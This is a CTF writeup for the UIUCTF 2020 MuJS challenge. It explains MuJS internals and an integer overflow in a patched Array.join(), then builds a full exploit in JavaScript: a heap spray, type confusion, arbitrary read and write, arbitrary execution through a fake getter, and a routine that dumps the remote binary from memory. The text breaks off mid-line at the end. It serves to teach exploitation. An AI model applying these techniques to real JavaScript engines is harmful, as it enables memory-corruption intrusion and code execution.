UIUCTF MuJS Writeup

# UIUCTF MuJS Writeup M30W@DiceGang [MuJS Official Repo](https://github.com/ccxvii/mujs) [Challenge Resource & Solve Script](https://github.com/jwang-a/CTF/tree/master/Writeups/UIUCTF2020/Pwn/MuJS) ## 0x00 > Table of Contents * [Table of Contents](#0x00-gt-Table-of-Contents) * [Introduction](#0x01-gt-Introduction) * [Target](#0x02-gt-Target) * [Goal](#0x02-01-gt-Goal) * [Additional Requirements](#0x02-02-gt-Additional-Requirements) * [MuJS](#0x03-gt-MuJS-Overview) * [JS Object](#0x03-01-gt-JS-Object) * [Access Object Attributes](##0x03-02-gt-Access-Object-Attributes) * [Patches](#0x04-gt-Patches) * [The Vuln](#0x04-01-gt-The-Vuln) * [Custom Memory Allocator](#0x04-02-gt-Custom-Memory-Allocator) * [New Object Type](#0x04-03-gt-New-Object-Type) * [Exploit](#0x05-gt-Exploit) * [Preparing Tools](#0x05-00-gt-Preparing-Tools) * [Attack Plan 1](#0x05-01-gt-Attack-Plan-1-Overflow-to-DataView-Length) * [Attack Plan 2](#0x05-02-gt-Attack-Plan-2-Object-Type-Confusion) * [Final Exploit](#0x05-03-gt-Final-exploit) * [Heap Overflow+Type Confusion](#0x05-03-01-gt-Crafting-a-heap-overflow-for-Type-Confusion) * [Heap Grooming](#0x05-03-02-gt-Heap-Grooming) * [AAR/AAW](#0x05-03-03-gt-Crafting-Arbitrary-Read/Write-Primitive) * [ACE](#0x05-03-04-gt-Crafting-Arbitrary-Execute-Primitive) * [An Unexpected Twist](#0x05-03-05-gt-An-unexpected-twist) * [Grey-Box 2 White-Box](#0x05-ff-gt-Bonus-Round-from-grey-box-to-white-box-amp-RCE) * [Conclusion](#0x06-gt-Conclusion) --- ## 0x01 > Introduction I played UIUCTF with DiceGang last weekend, and we secured first place with only one challenge left unsolved. Sadly, I was busy on the second day of CTF and only managed to do Accounting Accidents and MuJS with help from teammates. MuJS was a pretty cool challenge though, given that I always wanted to try js engine pwn but never really got into it. The fact that I failed to do **one-line JS** (another MuJS from 0CTF 2020) was even more reason for me to do this one. Here I'd like to share how my team managed to tackle the challenge. [Top](#UIUCTF-MuJS-Writeup) --- ## 0x02 > Target In this challenge, the author provided a README that illustrates the target of this challenge as well as some additional requirements. ### 0x02-01 > Goal While getting shell is not required, we are required to implement three common primitives used in js engine exploit. > read32(address) - Read an arbitrary 32-bit value from `address`. > > write32(address, value) - Write an arbitrary 32-bit value at `address`. > > exec(address) - Execute a function at `address`. We don't need control of any arguments. ### 0x02-02 > Additional Requirements These few lines caught our attention > To ensure your exploit isn't trash, our server will run your exploit against 5 different builds of the same MuJS code, that we aren't going to give you. All 5 builds are for Linux AARCH64 or X86-64 systems, with reasonable compiler options. Hmm, so we aren't allowed to use any shared library based features or do stuff that only works in specific architectures. This might be troublesome in later stages, but let's worry about this later. [Top](#UIUCTF-MuJS-Writeup) --- ## 0x03 > MuJS Overview This section covers the prerequisite knowledge about MuJS internals. For readers that are already familiar with MuJS, or don't want to spend too much time on it, feel free to skip to 0x04 where we discuss the vulnerable patch applied. ### 0x03-01 > JS Object **Object** is one of the key components in all js engines afaik, and MuJS is no exception. Apart from **Object**, related structures in MuJS such as **Values** and **Properties** are also shown here. **Object** is defined by ```struct js_Object``` An interesting charecteristic of MuJS **Object** is that it does not support inplace edits. Any modification on an object will result in creating a new instance of it. ```c= ! struct js_Object { enum js_Class type; int extensible; js_Property *properties; int count; /* number of properties, for array sparseness check */ js_Object *prototype; union { int boolean; double number; struct { const char *string; int length; } s; struct { int length; } a; struct { js_Function *function; js_Environment *scope; } f; struct { const char *name; js_CFunction function; js_CFunction constructor; int length; } c; js_Regexp r; struct { js_Object *target; js_Iterator *head; } iter; struct { const char *tag; void *data; js_HasProperty has; js_Put put; js_Delete delete; js_Finalize finalize; } user; struct { uint32_t length; uint8_t* data; } dataview; } u; js_Object *gcnext; /* allocation list */ js_Object *gcroot; /* scan list */ int gcmark; }; ``` **Value** is defined by ```struct js_Value``` ```c= ! struct js_Value { union { int boolean; double number; char shrstr[8]; const char *litstr; js_String *memstr; js_Object *object; } u; char pad[7]; /* extra storage for shrstr */ char type; /* type tag and zero terminator for shrstr */ }; ``` **Property** is defined by ```struct js_Property``` ```c= ! struct js_Property { const char *name; js_Property *left, *right; int level; int atts; js_Value value; js_Object *getter; js_Object *setter; }; ``` Digging deeper into the source code, we can understand how those three structures are linked together. For every independent **Object**, there exist one corresponding **Property** (I'll refer to this as **Identity Property** aka **Id_Prop** later). **Id_Props** are stored in a balanced tree and serves lookup purposes. Whenever an **Object** is refered in js code, our jsengine will traverse the tree to try to find the corresponding **Id_Prop**. Finally **Object** can be dereferenced through **Value** structure embedded within **Id_Prop**. ** Note that although independent **Object** must have a matching **Property**, it is not necessarily true the other way round. Some stuff such as **number** or **strings** may be stored directly in **Value**, which eliminates the need of a dedicated **Object**. A rough graphic outline is shown below (**Id_Prop** of **Object B Prototype** is omitted here for simplicity) : ![](https://i.imgur.com/0UFAPN1.png) Since all structures are allocated dynamically upon use, and MuJS doesn't implement any object type isolation mechanism like gigacage in JSC, we can expect to see all kinds of structures scattered across the heap during runtime. More details including how the lookup tree is balanced, and how a **sentinel node** is used as guarding leaf node are also interesting, but will not be covered here. Readers are encouraged to read the source code and learn those stuff. ### 0x03-02 > Access Object Attributes So we now know how **Objects** are linked together, the next step would be to understand how **methods** / **attributes** of **Object**, or more precisely, **Internal Properties** of **Objects** are accessed. From now on, I will refer to object attributes as **Obj_Attr**. The way MuJS handles javascript is by constructing AST and parsed bytecodes from raw javascript code. It then yields control over to a stack-based VM, which runs with those opcode as input. Diagram of the workflow is shown below : ![](https://i.imgur.com/A6s56G2.png) As mentioned above, the only part that we care about is how **Obj_Attr** are retrieved in the VM. So let's focus on that part. (The actual reason we are discussing this is that it will be utilized for arbitrary function call in our exploit, but we'll just stick with code review here and leave exploit for later). The opcode for accessing **Obj_Attr** with attribute name string is ```OP_GETPROP_S``` ```c= ! case OP_GETPROP_S: str = ST[*pc++]; obj = js_toobject(J, -1); jsR_getproperty(J, obj, str); js_rot2pop1(J); break; ``` which then calls ```jsR_getproperty()``` ```c= ! static void jsR_getproperty(js_State *J, js_Object *obj, const char *name) { if (!jsR_hasproperty(J, obj, name)) js_pushundefined(J); } ``` ```jsR_getproperty()``` is just a wrapper around ```jsR_hasproperty()```: You can probably notice that I've ommited part of the code below, the ommited part is basically some "special properties" or "fast path" for specific objects types. Since it is unlikely for those hardcoded properties to be of much use in exploiting, we'll just ignore it and focus on the generic path. The generic path searches for a **Property** with correct name in ```jsV_getproperty()```. If the **Property** is found, two possible branches follow. 1. call ```ref->getter``` function object if there is one 2. return ```ref->value``` The second route is the default behaviour, while the first route provides something like a hook. For those familiar with pwn, it should be obvious that by controlling the hook, there might be a chance to gain arbitrary code execution. ```c= ! static int jsR_hasproperty(js_State *J, js_Object *obj, const char *name) { js_Property *ref; int k; ... ref = jsV_getproperty(J, obj, name); if (ref) { if (ref->getter) { js_pushobject(J, ref->getter); js_pushobject(J, obj); js_call(J, 0); } else { js_pushvalue(J, ref->value); } return 1; } return 0; } ``` Let's dissect ```jsV_getproperty()``` first to see how an **Obj_Attr** is fetched. Recall that in the previous section, we saw how **Properties** are chained in a tree like structure, and tree is traversed upon referencing object.```lookup()``` is exactly where the tree traverse happens. What ```jsV_getproperty()``` does is search for **Property** in ```obj->properties``` tree first. If nothing is found in ``obj->properties``, it then fallback to brushing through the protoype chain list for inherited **Properties**. ```c= ! js_Property *jsV_getproperty(js_State *J, js_Object *obj, const char *name) { do { js_Property *ref = lookup(obj->properties, name); if (ref) return ref; obj = obj->prototype; } while (obj); return NULL; } ``` ```c= ! static js_Property *lookup(js_Property *node, const char *name) { while (node != &sentinel) { int c = strcmp(name, node->name); if (c == 0) return node; else if (c < 0) node = node->left; else node = node->right; } return NULL; } ``` Here is a program flow graph on the procedures covered above ![](https://i.imgur.com/spyloms.png) That's about enough background knowledge, now it's time to see what the challenge is about. [Top](#UIUCTF-MuJS-Writeup) --- ## 0x04 > Patches Similar to most js engine pwnables, the author provided a patched version of MuJS. The patch basically consists of the following parts. ### 0x04-01 > The Vuln README actually mentioned that the bug is introduced in the patch of Ap_join(), a function used to join array contents into a single string. The patch appears to be quite simple, some integer numbers are replaced by uint16_t ones. Further observation shows that those numbers are used as **malloc size** and **string length tracker**. We immediately realized that this patch could lead to 1. potential integer overflow 2. js_realloc() returning a chunk smaller than required 3. strcat heap buffer overflow Details about how to exploit this bug will be discussed in later sections. ```c= ! static void Ap_join(js_State *J) { char * volatile out = NULL; const char *sep; const char *r; int seplen; - int k, n, len; + uint16_t k, n, len; len = js_getlength(J, 0); if (js_isdefined(J, 1)) { sep = js_tostring(J, 1); seplen = strlen(sep); } else { sep = ","; seplen = 1; } if (len == 0) { js_pushliteral(J, ""); return; } if (js_try(J)) { js_free(J, out); js_throw(J); } n = 1; for (k = 0; k < len; ++k) { js_getindex(J, 0, k); if (js_isundefined(J, -1) || js_isnull(J, -1)) r = ""; else r = js_tostring(J, -1); n += strlen(r); if (k == 0) { out = js_malloc(J, n); strcpy(out, r); } else { n += seplen; out = js_realloc(J, out, n); strcat(out, sep); strcat(out, r); } js_pop(J, 1); } js_pushstring(J, out); js_endtry(J); js_free(J, out); } ``` ### 0x04-02 > Custom Memory Allocator The authors also replaced the default allocator with a custom one they built, which seems like a simplified version of magazine allocator used in macOS. Custom allocator logic could be summarized below. 1. memory is divided into **zones**, each held responsible for a certain chunk size. 2. In a specific **zone**, all chunks are of exact same size. The chunks are tiled up, with no header whatsoever. 3. Each **zone** also owns a singular linked list of all freed chunks. The linked list serves chunks in a LIFO manner. Behaviour is exactly same as fastbin in ptmalloc. 4. Upon ```malloc()```, the allocator seeks for the **best fit zone** (the zone with smallest chunk size that satisfies request), and returns a chunk from it. If target zone ran out of free chunks, an error is raised and process aborts. 5. Upon ```free()```, the chunk is released and linked into free chunk list. 6. ```realloc()``` acts as a wrapper of ```malloc()```/```free()```. A noticeable thing is that it does not shrink chunks. In all cases, it would ```malloc()``` a new chunk of desired size, and memcpy the contents there. Zones are initialized as below : Notice that the chunks are placed into free list from low address to high address, this observation will be useful later. ```c= ! void initialize_allocator() { zones[0].allocation_size = 0x10; zones[0].limit = 0x100000; zones[1].allocation_size = 0x30; zones[1].limit = 0x100000; zones[2].allocation_size = 0x80; zones[2].limit = 0x100000; zones[3].allocation_size = 0x100; zones[3].limit = 0x100000; zones[4].allocation_size = 0x200; zones[4].limit = 0x100000; zones[5].allocation_size = 0x400; zones[5].limit = 0x100000; zones[6].allocation_size = 0x800; zones[6].limit = 0x100000; for (int i = 0; i < NUM_ZONES; i++) { zones[i].base = mmap_memory_for_zone(zones[i].limit); free_list_t* prev = NULL; for (int j = 0; j < zones[i].limit / zones[i].allocation_size; j++) { free_list_t* curr = (free_list_t*)(zones[i].base + (zones[i].allocation_size * j)); curr->next = prev; prev = curr; } zones[i].free_list_head = prev; } } ``` And realloc code here: ```c= ! void* my_realloc(void* buffer, int size) { if (buffer == NULL) { return my_malloc(size); } if (size == 0) { my_free(buffer); return NULL; } uint64_t allocation_size = 0; uint64_t buffer_address = (uint64_t)buffer; for (int i = 0; i < NUM_ZONES; i++) { if (buffer_address >= (uint64_t) zones[i].base && buffer_address < (uint64_t) zones[i].base + (uint64_t) zones[i].limit) { allocation_size = zones[i].allocation_size; } } if (allocation_size == 0) { allocation_size = *(uint64_t*)(buffer-8); } void* newbuf = my_malloc(size); size_t min; if (size < allocation_size) { min = size; } else { min = allocation_size; } memcpy(newbuf, buffer, min); my_free(buffer); return newbuf; } ``` ### 0x04-03 > New Object Type Finally, a new object type **DataView** is introduced. Quoting ```struct js_Object``` from previous section, the inner structure of DataView is as below. ```c= ! struct { uint32_t length; uint8_t* data; } dataview; ``` **DataView** basically acts as a **Array Buffer** (a missing javascript component in MuJS), and supports operations on array type **Uint8** / **Uint16** / **Uint32**. The **Uint8** version of get/set functions is shown here ```c= ! static void Dv_getUint8(js_State *J) { js_Object *self = js_toobject(J, 0); if (self->type != JS_CDATAVIEW) js_typeerror(J, "not a DataView"); size_t index = js_tonumber(J, 1); printf("getUint8 %p %x\n", self->u.dataview.data, self->u.dataview.length); if (index < self->u.dataview.length) { js_pushnumber(J, self->u.dataview.data[index]); } else { js_pushundefined(J); } } static void Dv_setUint8(js_State *J) { js_Object *self = js_toobject(J, 0); if (self->type != JS_CDATAVIEW) js_typeerror(J, "not an DataView"); size_t index = js_tonumber(J, 1); uint8_t value = js_tonumber(J, 2); if (index < self->u.dataview.length) { self->u.dataview.data[index] = value; } else { js_error(J, "out of bounds access on DataView"); } } ``` The fact that **DataView** supports raw memory operations make it a juicy candidate for attacking, since once we succeed in hijacking its buffer pointer, it is quite easy to do arbitrary read/write. Noticeably, all **DataView** related functions have this line in it, which checks whether the **Object** type is correct. ```c= ! if (self->type != JS_CDATAVIEW) js_typeerror(J, "not an DataView"); ``` [Top](#UIUCTF-MuJS-Writeup) --- ## 0x05 > Exploit Now we've got to know MuJS internal mechanisms, and reviewed the patch, time to work on pwning it. ### 0x05-00 > Preparing Tools Debugging tools makes live easier. Good examples are ```describe()``` from **JSC** or ```%DebugPrint``` from **v8**. However there doesn't seem to be any similar tools in MuJS, therefore, I decided to build one myself. Below is the snippet I used to patch MuJS. 1. ```debug()``` prints the ```u``` field of ```js_Value```, which is a pointer to ```js_Object``` in most cases. This helps reduce time spent on finding objects in heap. 2. ```readline()``` is a native functions of MuJS. This function is useful in setting breakpoints to attach gdb. The author commented it out in his patch, so I just uncommented and reclaimed it. ```c= ! static void jsB_debug(js_State *J){ int i,top = js_gettop(J); for(i=1;i<top;++i){ printf("%p\n",(((char**)stackidx(J,i))[0])); } js_pushundefined(J); } main(){ ... js_newcfunction(J, jsB_debug, "debug", 0); js_setglobal(J, "debug"); js_newcfunction(J, jsB_readline, "readline", 0); js_setglobal(J, "readline"); ... } ``` ### 0x05-01 > Attack Plan 1 (Overflow to DataView Length) Our initial attack plan is quite simple, create a **DataView** object, and then utilize heap overflow to overwrite ```length``` field. This plan seemed feasbile at first glance, but soon got called off due to some difficulties. Recall that the DataView object would have a structure as below. ```c= ! struct js_Object { enum js_Class type; int extensible; js_Property *properties; int count; /* number of properties, for array sparseness check */ js_Object *prototype; union { struct { uint32_t length; uint8_t* data; } dataview; } u; js_Object *gcnext; /* allocation list */ js_Object *gcroot; /* scan list */ int gcmark; }; ``` To overwrite ```object.u.length``` field, we would need to first overwrite all the fields above it. This includes stuff like ```object.properties``` and ```object.prototype```. While it is possible to leak heap address through some crazy heap manipulation, we can't have any NULL bytes in the payload used for overwriting stuff. This means the two overwritten pointers are doomed to point to some unaccessible memory. Once again, recall that **Obj_Attr** are accessed through the ```lookup()``` function, which relies on those two pointers. Thus, if we clobber it up, it is no longer possible to access inherited methods that allow **DataView** to perform read / write. At this point, we concluded that overwriting length directly is impossible. A new plan is needed. ### 0x05-02 > Attack Plan 2 (Object Type Confusion) Now we know editing a **DataView** object to fit our need is hard. How about trying to do some type confusion on other objects? Searching high and low, we concluded that two object types, **userdata** & **RegExp**, are good candidates for type confusion. Let's look at the ```union``` field of **DataView**, **userdata** and **RegExp** to see why they are chosen as candidates. ```c= ! struct { uint32_t length; uint8_t* data; } dataview; struct { const char *tag; void *data; js_HasProperty has; js_Put put; js_Delete delete; js_Finalize finalize; } user; struct js_Regexp { void *prog; char *source; unsigned short flags; unsigned short last; }; ``` It is easy to notice both **RegExp** and **userdata** have pointers for first two fields. This means that if we manage to get a type confusion, ```length``` field of the **DataView** object would be relatively large, and most likely allow OOB access. The following question is, out of the two candidates, which should we use? Also, most of us should have heard of **RegExp** before, but what exactly is **userdata**? Reading the MuJS documents, I noticed this > Objects with the userdata class are provided to allow arbitrary C data to be attached to Javascript objects. A userdata object has a pointer to a block of raw memory, which is managed by the host. Userdata values cannot be created or modified in Javascript, only through the C API. This guarantees the integrity of data owned by the host program. So **userdata** is actually a C API for developers, and we can't access it in js exploit scripts. This leaves **RegExp** as our only choice. Next on is the type confusion part, readers might have noticed that there is a ```type``` field at the very start of **Object** structure, this is exactly how MuJS differentiates between object types. ```type``` is actually just a number from ```enum js_Class```, which we could easily change given that it is the first field of **Object**. ```c= ! enum js_Class { JS_COBJECT, JS_CARRAY, JS_CFUNCTION, JS_CSCRIPT, /* function created from global code */ JS_CEVAL, /* function created from eval code */ JS_CCFUNCTION, /* built-in function */ JS_CERROR, JS_CBOOLEAN, JS_CNUMBER, JS_CSTRING, JS_CREGEXP, JS_CDATE, JS_CMATH, JS_CJSON, JS_CARGUMENTS, JS_CITERATOR, JS_CUSERDATA, JS_CDATAVIEW, }; ``` Ok, suppose we have a **RegExp** object with type overwritten to **DataView**, but how can we access the **DataView** methods? For normal **DataView** objects, the methods are inherited directly from **DataView** prototype, however, the type confused object we have at hand inherited it's share from **RegExp** prototype. We must find a way to sneak the **DataView** methods into our **originally-RexExp-now-DataView** object. It turns out javascript has this cool feature where we can refer to the prototype function with something like this ```DataView.prototype.setUint32``` So with the following js code below, we can actually add **DataView** methods to any arbitrary object under its **Property** tree. ```javascript= ! Obj.edit = DataView.prototype.setUint32; Obj.show = DataView.prototype.getUint32; ``` Recall that I mentioned earlier, when accessing **Object** methods, ```lookup()``` will try searching in ```object->property```. This means that the code above have actually succeeded in transferring the **DataView** method to our **originally-RegExp** object. We've now got a solid plan, let's carry on to actually writing some exploit. ### 0x05-03 > Final exploit #### 0x05-03-01 > Crafting a heap overflow for Type Confusion Up To this point, we have been treating heap overflow as a given. Now we need to get our hands dirty and craft the actual payload. As mentioned earlier, the bug came from patching some **int** to **uint16**, now let's zoom in on how the ```Ap_join()``` function actually works. 1. First, the function calculates length of seperator, which we will set to an empty string for simplicity. So this part can be ignored. 2. It then sets the total string length ```n``` (a uint16 num) to 1, pre-allocating space for the terminating NULL byte for joined string. 3. Finally, it iterates over the elements in array, get their length with ```strlen()``` and add it to ```n```, then ```realloc()``` chunk based ```n``` and concat the strings. This is where stuff starts getting interesting. Below is the code where the vulnerability resides. I've removed/replace some irrelevant stuff with pseudo code to make it easier to read. ```c= ! for (k = 0; k < len; ++k) { r = STRING at index k n += strlen(r); if (k == 0) { out = js_malloc(J, n); strcpy(out, r); } else { ... out = js_realloc(J, out, n); strcat(out, r); ... } ... } ``` It is obvious that ```n += strlen(r)``` is the line where overflow happens. And when this happens, ```js_realloc()``` will return a new chunk with size satisfying ```n```, but probably not large enough to accomodate ```r```. Thus resulting in heap BOF. The first step we made here is trying to craft an array with many short strings that sum up to large length and trigger bug. ```javascript= ! var ARR=[]; for(var i=0; i<0x10001; i++){ ARR[i] = "a"; } ``` This immediately led to heap exhaust error. Fair enough. So how can we do this in a more elegant way?```repeat()``` function is not present in MuJS, but we can easily create our own simplified version of repeat with the following. This code essentially produces an array filled with STRING with length of power of 2. ```javascript= ! var STRING=[]; var cnt = 1; STRING[cnt] = "P"; for(var i=0;i<16;i++){ STRING[cnt*2] = STRING[cnt]+STRING[cnt]; cnt*=2; } ``` And now we can craft an array to trigger overflow. ```javascript= ! var overflower=[PADDING[0x8000], PADDING[0x8000]; overflower.join() ``` However simply overflowing is not enough, since our plan is to overwrite ```obj.type``` of a **RegExp** object, fine grained control over the joined string is necessary. So let's examine how ```realloc()``` works when overflow happens. The relevant code is shown below, once again, unrelated code is removed, and some pseudo code is used. ```c= ! void* my_realloc(void* buffer, int size) { ... uint64_t allocation_size = buffer size void* newbuf = my_malloc(size); size_t min; if (size < allocation_size) { min = size; } else { min = allocation_size; } memcpy(newbuf, buffer, min); ... } ``` On overflow, ```allocation_size``` is most likely larger than ```size```, so we will be taking the ```min = size``` path here. And since the original string is longer then ```min```, ```memcpy``` content will not contain any NULL bytes. Summing that up, we can reach the conclusion that ```my_realloc()``` basically creates a chunk, fills it up to ```size```(```n``` in ```Ap_join()```), and hands it back for ```strcat()```. ** The catch here is that since ```my_realloc()``` does not cleanup chunk, it is possible that memcopied content is immediately followed by non NULL bytes. We will deal with this problem in the heap grooming section. But let's assume that memcopied data is followed by a NULL byte now. Back to crafting overflow. We already know that the size of **js_Object** = 0x68, so we would need a chunk from the 0x80 zone to be able to perform intended overwrite. A favorable setup would be having a large string as first argument of array, and a smaller one to perform strcat overflow. After some calculation, I reached the array ```javascript= ! var overflower = [PADDING[0x10000].slice(0x81+1), PADDING[0x40]+PADDING[0x80]+"\x11"]; var victim = RegExp(PADDING[0x40]); overflower.join(); ``` This script overflows 0x81 bytes of data, and the last byte will be 0x11 (type of **DataView**). The reason that we need 0x81 bytes overflow instead of 1 byte overflow is that **RegExp** mallocs a chunk to store its source string, and we would like the string to be in same zone as **js_Object** (reason discussed later in heap grooming section). ![](https://i.imgur.com/TOOITN6.png) So we get the **overflower** to realloc a chunk right above ```victim.u.source``` string buffer, the 0x11 will be written into ```victim.type```, achieving our goal of changing ```victim``` to **DataView** type. #### 0x05-03-02 > Heap Grooming We have achieved heap overflow and type hijack, but only under a lot of assumption of where chunks are allocated. In this section, we are going to discuss the reasons behind certain heap layout as well as how to achieve it. From my experience in 0CTF, MuJS heap layout is "super dynamic", meaning it changes a lot easily upon the slightest change of js script. This is partially due to 0CTF using glibc default allocator, and a lot of heap consolidating/splitting is happening throughout the process. Another reason is MuJS tends to allocate lots of object during setup and javascript parsing phase. To defeat this, we would first need to rethink our target and have a clear mental image of the heap layout needed. Recall our ultimate goal is to gain AAR/AAW, and we would like to do so with Object type confusion. Now let's take a moment to think about it. The type confusion mentioned earlier does grant OOB access, but is that truly arbitrary address access? Sadly... no. The type confusion only provides access to memory region between ```*prog ~ *prog+(unsigned int)(*source)```. So how do we transform this large OOB into a true arbitrary address access? The answer is quite simple, some slave/master construction. If we have another slave **DataView** object within access of the type confused **master**, it is possible to utilize **master** to modify **slave** data pointer, and then perform AAR/AAW with **slave**. Let's try illustrating an ideal setup. ![](https://i.imgur.com/FVp36Nu.png) In this setup, **slave Object** will definitely be within **master data** access range. This is the very reason I would like to have **master data** (Previously **RegExp source**) allocated in the same zone as **js_Object**. Finally, we need to figure out how to get this setup. The main obstacle of getting contiguous chunk allocated is that there are those freed chunks scattered all around heap, and we might accidently acquire one while doing malloc(). Thus ,it is necessary to eliminate those non-contiguous freed chunks. The following script sprays a lot of **js_Object** sized chunks onto heap to take the non-contiguous chunks out of heap, and provides a non-fragmented (and pretty likely, completely fresh, unused before) heap for further operation. ```javascript= ! var spray=[]; for(var i=0;i<1000;i++){ spray.push(PADDING[0x40]); } ``` Another benefit of this spraying snippet is that it handles the realloc memcpy non NULL terminated problem mentioned earlier, since Ap_join string will most likely land on a some new, unused area. Getting our hands on a non-fragmented heap is neat, but this isn't quite enough to guarantee everything will be in the right place. The order of creating objects also matter. I mentioned earlier that the custom heap free linked list operates in a **LIFO** manner, and chunks within arena are placed into freed list from lower address to higher address. This means objects at higher address will be created before the ones in lower address. Summing all this up, we can get the javascript code below ```javascript= ! //Taking advantage of MuJS storing arrays items as individual properties and set index==strlen var PADDING=[]; var cnt = 1; PADDING[cnt] = "P"; for(var i=0;i<16;i++){ PADDING[cnt*2] = PADDING[cnt]+PADDING[cnt]; cnt*=2; } //prepare array to join and trigger overflow var overflower = [PADDING[0x10000].slice(0x81+1), PADDING[0x40]+PADDING[0x80]+"\x11"]; //From this point on, we need to be careful with heap layout //Spray chunks onto 0x80 zone to fill those dangling chunks, so that we will have a contiguous heap to work on var spray=[]; for(var i=0;i<1000;i++){ spray.push(PADDING[0x40]); } //Create slave, master in correct order var slave = DataView(8); var master = RegExp(PADDING[0x40]); //trigger overflow and overwrite master.type overflower.join(""); //Layout sensitive objects are all put in place, we don't need to care about heap layout anymore ``` #### 0x05-03-03 > Crafting Arbitrary Read/Write Primitive At this point, creating the AAR/AAW primitive is a piece of cake, just don't forget to assign **DataView.prototype** methods to **master** before starting. set **master** methods ```javascript= ! master.edit = DataView.prototype.setUint32; master.show = DataView.prototype.getUint32; ``` javascript realization of primitives ```javascript= ! function read32(addr,master,slave){ //set slave data buffer to target address master.edit(0x128,addr%0x100000000); master.edit(0x12c,addr/0x100000000); //read from slave data buffer return slave.getUint32(0); } function write32(addr,value,master,slave){ //set slave data buffer to target address master.edit(0x128,addr%0x100000000); master.edit(0x12c,addr/0x100000000); //write to slave data buffer slave.setUint32(0,value); } ``` #### 0x05-03-04 > Crafting Arbitrary Execute Primitive We've reached to the last part of exploit, the arbitrary execute primitive. Now with AAR/AAW at hand, how could we possibly tackle this? The answer is with **getter** functions. Before going into the details, keep in mind that this is far from the simplest way to achieve arbitrary code execution. I only chose this exploit path to exercise my skills over manipulating jsengine objects, and to keep the exploit strictly within **master**/**slave** objects. Now let's se how it is actually done. Recall that if a getter is present in some object attribute (a **js_Property** struct), it will be called upon retrieving the object. However, after reviewing the **js_Property** struct one more time, we can see ```getter``` is a **js_Object** pointer rather than a function pointer. ```c= ! struct js_Property { const char *name; js_Property *left, *right; int level; int atts; js_Value value; js_Object *getter; js_Object *setter; }; ``` This got me wondering about how ```js_call()``` actually works. So i looked up the source code and figured out that ```js_call()``` handles 4 kinds of objects, and out of those 4, JS_CCFUNCTION is the one that handles raw c function pointers. ```c= ! void js_call(js_State *J, int n) { js_Object *obj; int savebot; if (!js_iscallable(J, -n-2)) js_typeerror(J, "%s is not callable", js_typeof(J, -n-2)); obj = js_toobject(J, -n-2); savebot = BOT; BOT = TOP - n - 1; if (obj->type == JS_CFUNCTION) { ... } else if (obj->type == JS_CSCRIPT) { ... } else if (obj->type == JS_CEVAL) { ... } else if (obj->type == JS_CCFUNCTION) { jsR_pushtrace(J, obj->u.c.name, "native", 0); jsR_callcfunction(J, n, obj->u.c.length, obj->u.c.function); --J->tracetop; } ... } static void jsR_callcfunction(js_State *J, int n, int min, js_CFunction F) { int i; js_Value v; for (i = n; i < min; ++i) js_pushundefined(J); F(J); v = *stackidx(J, -1); TOP = --BOT; /* clear stack */ js_pushvalue(J, v); } ``` That should be enough information, let's draw a graph of the objects used on **getter** call. ![](https://i.imgur.com/T5RIg8r.png) The graph should have made it pretty clear that to call a **fake getter**, we would need to craft two structures, one **fake Property** and one **fake JS_CCFUNCTION Object**. These two objects can be crafted in **master.data** region to satisfy the "strictly contained" rule I mentioned earlier. Here is the code for execute primitive (u64/write64 are helper functions crafted from pure js code or previous primitives) ```javascript= ! function execute(addr,master,slave){ //Store slave original properties var original_property = master.show(0x108)+ master.show(0x10c)*0x100000000; //Use data of master as fake structure crafting ground var target_property = master.show(0xa8)+ master.show(0xac)*0x100000000; //Craft fake Property write64(target_property,target_property+0x10,master,slave); write64(target_property+0x10,u64("trigger\x00"),master,slave); write64(target_property+0x30,target_property+0x40,master,slave); //Craft fake function object write32(target_property+0x40,0x5,master,slave); write64(target_property+0x68,addr,master,slave); write64(target_property+0x78,0,master,slave); //Overwrite slave properties to fake one master.edit(0x108,target_property%0x100000000); master.edit(0x10c,target_property/0x100000000); //trigger getter slave.trigger; //Restore slave original properties master.edit(0x108,original_property%0x100000000); master.edit(0x10c,original_property/0x100000000); } ``` #### 0x05-03-05 > An unexpected twist We've finally got a locally working exploit after some 15 hours, and decided to test it on remote server, just to realize stdout isn't echoing back properly (on the other hand, stderr had no similar issues). After contacting the admins and waiting for them to figrure out what was wrong, we took our time trying all kinds of stuff to get the flag through stderr. Several attemps worked, such as using```throw(flag)```/```eval(flag)``` instead of ```print(flag)```. A bit later, challenge author @samsonites told me a possible cause might be stdout buffering. His guess was since our exploit script crashes at some point, stdout never gets flushed properly. After learning about this, I decided to review my exploit once again and try to avoid the crash. It turns out that the root cause of crash is quite simple. We changed **slave.data** while performing AAR/AAW, but never bothered to change it back. So in the cleanup procedure, process tries to free stuff pointed to by **slave.data** and fails miserably. The solution is thus to store original **slave.data** pointer value, and restore it before exiting. Source Scripts : [Complete Exploit Script](https://github.com/jwang-a/CTF/blob/master/Writeups/UIUCTF2020/Pwn/MuJS/exploit_required.js) ### 0x05-ff > Bonus Round (from grey-box to white-box & RCE) The setting of this challenge is pretty interesting, as it closely resembles a real life situation where we might have access to source code of some vulnerable project, but not the exact build running on attack target. This lead me to think about how it could be possible to attack such a grey-box model. Using MuJS as experiment material, I realized it is actually not that hard. This section will be about how to go from grey-box to white-box given the primitives, and demo how I got shell on one of the target binaries. First examine the main problem here is we don't have access to binary running on remote server. But also keep in mind that we've already got AAR primitive. So if we managed to get our hands on any pointers into the binary, it is actually possible to exfiltrate the entire stuff by doing AAR with offsets to the pointer. For most jsengines, pointers into binaries are inevitable since there will be function pointers within objects. Let's get working on a function for this. ```javascript= ! function exfiltrate(base_addr,orientation,length,master,slave){ //orientation is +-1, indicating the direction to read //length should be a mutliple of 0x4, since we aare reading 4 bytes at a time if(orientation==-1){ base_addr-=4; } for(var offset=0;(offset*orientation)<length;offset+=(4*orientation)){ print(read32(base_addr+offset,master,slave)); } } ``` After retrieving the binary, we can then retrieve shared library with pointers into it (these should be extractable from binary if shared libraries exist). The next step after Data Exfiltration would be spawing a shell. The challenge here is all remote processes are ran in chroot, thus I couldn't access /bin/sh or any other executables on the server. To demonstrate remote get shell under such limitation, I implemented a minimal shell with 3 commands (ls, cat, exit) in assembly. Below is the code and screenshot of getting shell on first remote binary. (Utility codes used to parse dumped binary/run minimal shell can be found in my github repo). ```javascript= ! //exfiltrate first remote binary and analyze statically before doing the later steps //+1 to Challenge.exec() is to make it 4 bytes aligned //The code used to parse runtime memory dump to IDA recognizable ELF can be found in my github repo exfiltrate(Challenge.exec()+1,-1,0x8040,master,slave); exfiltrate(Challenge.exec()+1,1,0x42fc0,master,slave); exfiltrate(Challenge.exec()+1+0x43fc0,1,0x3000,master,slave); //Leak code base var sentinel_addr = master.show(0x108)+master.show(0x10c)*0x100000000; var code_base = 